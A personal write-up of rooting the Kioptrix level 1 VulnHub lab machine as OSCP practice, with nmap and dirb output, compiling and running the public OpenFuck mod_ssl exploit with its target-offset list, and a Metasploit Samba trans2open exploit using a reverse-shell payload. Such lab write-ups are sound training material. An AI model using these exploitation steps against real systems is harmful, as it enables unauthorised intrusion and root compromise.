Write-up kioptrix level 1

This is my first write-up to solve kioptrix Machine level 1 form Vulnhub, as training for OSCP.

Description of Kioptrix VM Image Challenges:

You can Download the Machine from here.

# First Method

Network Scanning

#sudo netdiscover -i eth0

The Target IP is 192.168.1.104

Enumeration

┌─[✗]─[le0mx@parrot]─[~]
└──╼ $sudo nmap -A -O -sV 192.168.1.104
Starting Nmap 7.91 ( https://nmap.org ) at 2020–12–19 15:32 EET
Nmap scan report for 192.168.1.104
Host is up (0.00074s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
| ssh-hostkey:
| 1024 b8:74:6c:db:fd:8b:e6:66:e9:2a:2b:df:5e:6f:64:86 (RSA1)
| 1024 8f:8e:5b:81:ed:21:ab:c1:80:e1:57:a3:3c:85:c4:71 (DSA)
|_ 1024 ed:4e:a9:4a:06:14:ff:15:14:ce:da:3a:80:db:e2:81 (RSA)
|_sshv1: Server supports SSHv1
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: Test Page for the Apache Web Server on Red Hat Linux
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 32768/tcp status
|_ 100024 1 32768/udp status
139/tcp open netbios-ssn Samba smbd (workgroup: vMYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-server-header: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName= —
| Not valid before: 2009–09–26T09:32:06
|_Not valid after: 2010–09–26T09:32:06
|_ssl-date: 2020–12–19T14:35:33+00:00; +1h01m49s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_ SSL2_RC4_128_EXPORT40_WITH_MD5
32768/tcp open status 1 (RPC #100024)
MAC Address: 00:0C:29:D0:96:D8 (VMware)
Device type: general purpose
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9–2.4.18 (likely embedded)
Network Distance: 1 hop
Host script results:
|_clock-skew: 1h01m48s
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
TRACEROUTE
HOP RTT ADDRESS
1 0.74 ms 192.168.1.104
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 58.50 seconds

I found many ports are open like 22 SSH, 80 HTTP, 111 rpcbind, 139 SMB, and 443 HTTPS.

For Ports 80, 443, let’s discover some hidden files and directories URL by Dirb

┌─[✗]─[le0mx@parrot]─[~]
└──╼ $dirb http://192.168.1.104/
— — — — — — — — -
DIRB v2.22
By The Dark Raver
— — — — — — — — -
START_TIME: Sat Dec 19 16:14:10 2020
URL_BASE: http://192.168.1.104/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
— — — — — — — — -GENERATED WORDS: 4612— — Scanning URL: http://192.168.1.104/ — —
+ http://192.168.1.104/~operator (CODE:403|SIZE:273)
+ http://192.168.1.104/~root (CODE:403|SIZE:269)
+ http://192.168.1.104/cgi-bin/ (CODE:403|SIZE:272)
+ http://192.168.1.104/index.html (CODE:200|SIZE:2890)
==> DIRECTORY: http://192.168.1.104/manual/
==> DIRECTORY: http://192.168.1.104/mrtg/
==> DIRECTORY: http://192.168.1.104/usage/

— — Entering directory: http://192.168.1.104/manual/ — —
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

— — Entering directory: http://192.168.1.104/mrtg/ — —
+ http://192.168.1.104/mrtg/index.html (CODE:200|SIZE:17318)

— — Entering directory: http://192.168.1.104/usage/ — —
+ http://192.168.1.104/usage/index.html (CODE:200|SIZE:3704)

— — — — — — — — -
END_TIME: Sat Dec 19 16:14:28 2020
DOWNLOADED: 13836 — FOUND: 6

I found many directories but after checking, nothing is exciting,

But I noted port no. 443 is open and running service Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b),

Let’s check if it has a public exploit or not, I used Exploit-DB and the Result is

mmmmmmmmm

okay let’s choose the updated exploit 2019–07–07, After Download it, We Will run the commands below.

┌─[✗]─[le0mx@parrot]─[~/Desktop]
└──╼ $gcc 47080.c -o exploit_mod_ssl -lcrypto
┌─[le0mx@parrot]─[~/Desktop]
└──╼ $chmod +x exploit_mod_ssl

Exploitation

let’s check the Usage.

┌─[le0mx@parrot]─[~/Desktop]
└──╼ $./exploit_mod_ssl
*******************************************************************
* OpenFuck v3.0.4-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam — LSD-pl — SolarEclipse — CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
: Usage: ./exploit_mod_ssl target box [port] [-c N]target — supported box eg: 0x00
box — hostname or IP address
port — port for ssl connection
-c open N connections. (use range 40–50 if u dont know)
Supported OffSet:
0x00 — Caldera OpenLinux (apache-1.3.26)
0x01 — Cobalt Sun 6.0 (apache-1.3.12)
0x02 — Cobalt Sun 6.0 (apache-1.3.20)
0x03 — Cobalt Sun x (apache-1.3.26)
0x04 — Cobalt Sun x Fixed2 (apache-1.3.26)
0x05 — Conectiva 4 (apache-1.3.6)
0x06 — Conectiva 4.1 (apache-1.3.9)
0x07 — Conectiva 6 (apache-1.3.14)
0x08 — Conectiva 7 (apache-1.3.12)
0x09 — Conectiva 7 (apache-1.3.19)
0x0a — Conectiva 7/8 (apache-1.3.26)
0x0b — Conectiva 8 (apache-1.3.22)
0x0c — Debian GNU Linux 2.2 Potato (apache_1.3.9–14.1)
0x0d — Debian GNU Linux (apache_1.3.19–1)
0x0e — Debian GNU Linux (apache_1.3.22–2)
0x0f — Debian GNU Linux (apache-1.3.22–2.1)
0x10 — Debian GNU Linux (apache-1.3.22–5)
0x11 — Debian GNU Linux (apache_1.3.23–1)
0x12 — Debian GNU Linux (apache_1.3.24–2.1)
0x13 — Debian Linux GNU Linux 2 (apache_1.3.24–2.1)
0x14 — Debian GNU Linux (apache_1.3.24–3)
0x15 — Debian GNU Linux (apache-1.3.26–1)
0x16 — Debian GNU Linux 3.0 Woody (apache-1.3.26–1)
0x17 — Debian GNU Linux (apache-1.3.27)
0x18 — FreeBSD (apache-1.3.9)
0x19 — FreeBSD (apache-1.3.11)
0x1a — FreeBSD (apache-1.3.12.1.40)
0x1b — FreeBSD (apache-1.3.12.1.40)
0x1c — FreeBSD (apache-1.3.12.1.40)
0x1d — FreeBSD (apache-1.3.12.1.40_1)
0x1e — FreeBSD (apache-1.3.12)
0x1f — FreeBSD (apache-1.3.14)
0x20 — FreeBSD (apache-1.3.14)
0x21 — FreeBSD (apache-1.3.14)
0x22 — FreeBSD (apache-1.3.14)
0x23 — FreeBSD (apache-1.3.14)
0x24 — FreeBSD (apache-1.3.17_1)
0x25 — FreeBSD (apache-1.3.19)
0x26 — FreeBSD (apache-1.3.19_1)
0x27 — FreeBSD (apache-1.3.20)
0x28 — FreeBSD (apache-1.3.20)
0x29 — FreeBSD (apache-1.3.20+2.8.4)
0x2a — FreeBSD (apache-1.3.20_1)
0x2b — FreeBSD (apache-1.3.22)
0x2c — FreeBSD (apache-1.3.22_7)
0x2d — FreeBSD (apache_fp-1.3.23)
0x2e — FreeBSD (apache-1.3.24_7)
0x2f — FreeBSD (apache-1.3.24+2.8.8)
0x30 — FreeBSD 4.6.2-Release-p6 (apache-1.3.26)
0x31 — FreeBSD 4.6-Realease (apache-1.3.26)
0x32 — FreeBSD (apache-1.3.27)
0x33 — Gentoo Linux (apache-1.3.24-r2)
0x34 — Linux Generic (apache-1.3.14)
0x35 — Mandrake Linux X.x (apache-1.3.22–10.1mdk)
0x36 — Mandrake Linux 7.1 (apache-1.3.14–2)
0x37 — Mandrake Linux 7.1 (apache-1.3.22–1.4mdk)
0x38 — Mandrake Linux 7.2 (apache-1.3.14–2mdk)
0x39 — Mandrake Linux 7.2 (apache-1.3.14) 2
0x3a — Mandrake Linux 7.2 (apache-1.3.20–5.1mdk)
0x3b — Mandrake Linux 7.2 (apache-1.3.20–5.2mdk)
0x3c — Mandrake Linux 7.2 (apache-1.3.22–1.3mdk)
0x3d — Mandrake Linux 7.2 (apache-1.3.22–10.2mdk)
0x3e — Mandrake Linux 8.0 (apache-1.3.19–3)
0x3f — Mandrake Linux 8.1 (apache-1.3.20–3)
0x40 — Mandrake Linux 8.2 (apache-1.3.23–4)
0x41 — Mandrake Linux 8.2 #2 (apache-1.3.23–4)
0x42 — Mandrake Linux 8.2 (apache-1.3.24)
0x43 — Mandrake Linux 9 (apache-1.3.26)
0x44 — RedHat Linux ?.? GENERIC (apache-1.3.12–1)
0x45 — RedHat Linux TEST1 (apache-1.3.12–1)
0x46 — RedHat Linux TEST2 (apache-1.3.12–1)
0x47 — RedHat Linux GENERIC (marumbi) (apache-1.2.6–5)
0x48 — RedHat Linux 4.2 (apache-1.1.3–3)
0x49 — RedHat Linux 5.0 (apache-1.2.4–4)
0x4a — RedHat Linux 5.1-Update (apache-1.2.6)
0x4b — RedHat Linux 5.1 (apache-1.2.6–4)
0x4c — RedHat Linux 5.2 (apache-1.3.3–1)
0x4d — RedHat Linux 5.2-Update (apache-1.3.14–2.5.x)
0x4e — RedHat Linux 6.0 (apache-1.3.6–7)
0x4f — RedHat Linux 6.0 (apache-1.3.6–7)
0x50 — RedHat Linux 6.0-Update (apache-1.3.14–2.6.2)
0x51 — RedHat Linux 6.0 Update (apache-1.3.24)
0x52 — RedHat Linux 6.1 (apache-1.3.9–4)1
0x53 — RedHat Linux 6.1 (apache-1.3.9–4)2
0x54 — RedHat Linux 6.1-Update (apache-1.3.14–2.6.2)
0x55 — RedHat Linux 6.1-fp2000 (apache-1.3.26)
0x56 — RedHat Linux 6.2 (apache-1.3.12–2)1
0x57 — RedHat Linux 6.2 (apache-1.3.12–2)2
0x58 — RedHat Linux 6.2 mod(apache-1.3.12–2)3
0x59 — RedHat Linux 6.2 update (apache-1.3.22–5.6)1
0x5a — RedHat Linux 6.2-Update (apache-1.3.22–5.6)2
0x5b — Redhat Linux 7.x (apache-1.3.22)
0x5c — RedHat Linux 7.x (apache-1.3.26–1)
0x5d — RedHat Linux 7.x (apache-1.3.27)
0x5e — RedHat Linux 7.0 (apache-1.3.12–25)1
0x5f — RedHat Linux 7.0 (apache-1.3.12–25)2
0x60 — RedHat Linux 7.0 (apache-1.3.14–2)
0x61 — RedHat Linux 7.0-Update (apache-1.3.22–5.7.1)
0x62 — RedHat Linux 7.0–7.1 update (apache-1.3.22–5.7.1)
0x63 — RedHat Linux 7.0-Update (apache-1.3.27–1.7.1)
0x64 — RedHat Linux 7.1 (apache-1.3.19–5)1
0x65 — RedHat Linux 7.1 (apache-1.3.19–5)2
0x66 — RedHat Linux 7.1–7.0 update (apache-1.3.22–5.7.1)
0x67 — RedHat Linux 7.1-Update (1.3.22–5.7.1)
0x68 — RedHat Linux 7.1 (apache-1.3.22-src)
0x69 — RedHat Linux 7.1-Update (1.3.27–1.7.1)
0x6a — RedHat Linux 7.2 (apache-1.3.20–16)1
0x6b — RedHat Linux 7.2 (apache-1.3.20–16)2
0x6c — RedHat Linux 7.2-Update (apache-1.3.22–6)
0x6d — RedHat Linux 7.2 (apache-1.3.24)
0x6e — RedHat Linux 7.2 (apache-1.3.26)
0x6f — RedHat Linux 7.2 (apache-1.3.26-snc)
0x70 — Redhat Linux 7.2 (apache-1.3.26 w/PHP)1
0x71 — Redhat Linux 7.2 (apache-1.3.26 w/PHP)2
0x72 — RedHat Linux 7.2-Update (apache-1.3.27–1.7.2)
0x73 — RedHat Linux 7.3 (apache-1.3.23–11)1
0x74 — RedHat Linux 7.3 (apache-1.3.23–11)2
0x75 — RedHat Linux 7.3 (apache-1.3.27)
0x76 — RedHat Linux 8.0 (apache-1.3.27)
0x77 — RedHat Linux 8.0-second (apache-1.3.27)
0x78 — RedHat Linux 8.0 (apache-2.0.40)
0x79 — Slackware Linux 4.0 (apache-1.3.6)
0x7a — Slackware Linux 7.0 (apache-1.3.9)
0x7b — Slackware Linux 7.0 (apache-1.3.26)
0x7c — Slackware 7.0 (apache-1.3.26)2
0x7d — Slackware Linux 7.1 (apache-1.3.12)
0x7e — Slackware Linux 8.0 (apache-1.3.20)
0x7f — Slackware Linux 8.1 (apache-1.3.24)
0x80 — Slackware Linux 8.1 (apache-1.3.26)
0x81 — Slackware Linux 8.1-stable (apache-1.3.26)
0x82 — Slackware Linux (apache-1.3.27)
0x83 — SuSE Linux 7.0 (apache-1.3.12)
0x84 — SuSE Linux 7.1 (apache-1.3.17)
0x85 — SuSE Linux 7.2 (apache-1.3.19)
0x86 — SuSE Linux 7.3 (apache-1.3.20)
0x87 — SuSE Linux 8.0 (apache-1.3.23)
0x88 — SUSE Linux 8.0 (apache-1.3.23–120)
0x89 — SuSE Linux 8.0 (apache-1.3.23–137)
0x8a — Yellow Dog Linux/PPC 2.3 (apache-1.3.22–6.2.3a)
Fuck to all guys who like use lamah ddos. Read SRC to have no surprise.

The Usage: ./exploit_mod_ssl target box [port] [-c N]

Our Target regarding the Supported OffSet list will be 0x6a or 0x6b

0x6a — RedHat Linux 7.2 (apache-1.3.20–16)1
0x6b — RedHat Linux 7.2 (apache-1.3.20–16)2

-c open N connections will be 138 as per the exploit code

Now, let’s try with 0x6a

unfortunately, didn’t work, let’s try with 0x6b

Yeeeeeeeeeeeeeeeees, it’s working Now and I got root permission

# Second Method

Enumeration

I note port no.193 have samba service, let’s check the version maybe is vulnerable,,

┌─[✗]─[le0mx@parrot]─[~]
└──╼ $sudo msfconsole
______________________________________________________________________________
| |
| METASPLOIT CYBER MISSILE COMMAND V5 |
|______________________________________________________________________________|
\ / /
\ . / / x
\ / /
\ / + /
\ + / /
* / /
/ . /
X / / X
/ ###
/ # % #
/ ###
. /
. / . * .
/
*
+ *
^
#### __ __ __ ####### __ __ __ ####
#### / \ / \ / \ ########### / \ / \ / \ ####
################################################################################
################################################################################
# WAVE 5 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
https://metasploit.com
=[ metasploit v6.0.16-dev ]
+ -- --=[ 2074 exploits - 1124 auxiliary - 352 post ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
Metasploit tip: View all productivity tips with the tips commandmsf6 > search smb_versionMatching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/smb/smb_version normal No SMB Version Detection
Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smb/smb_version

I will use auxiliary/scanner/smb/smb_version to get the version

The version is Samba 2.2.1a let’s google it if it has exploitation or not,

Yes, After searching I found an exploit on Rapid7 (Samba trans2open Overflow)

Exploitation

I was set linux/x86/shell_reverse_tcp as a payload, let’s set options,

And Let’s run the exploit ;)

Awesome I got root permission again.

Penetration Tester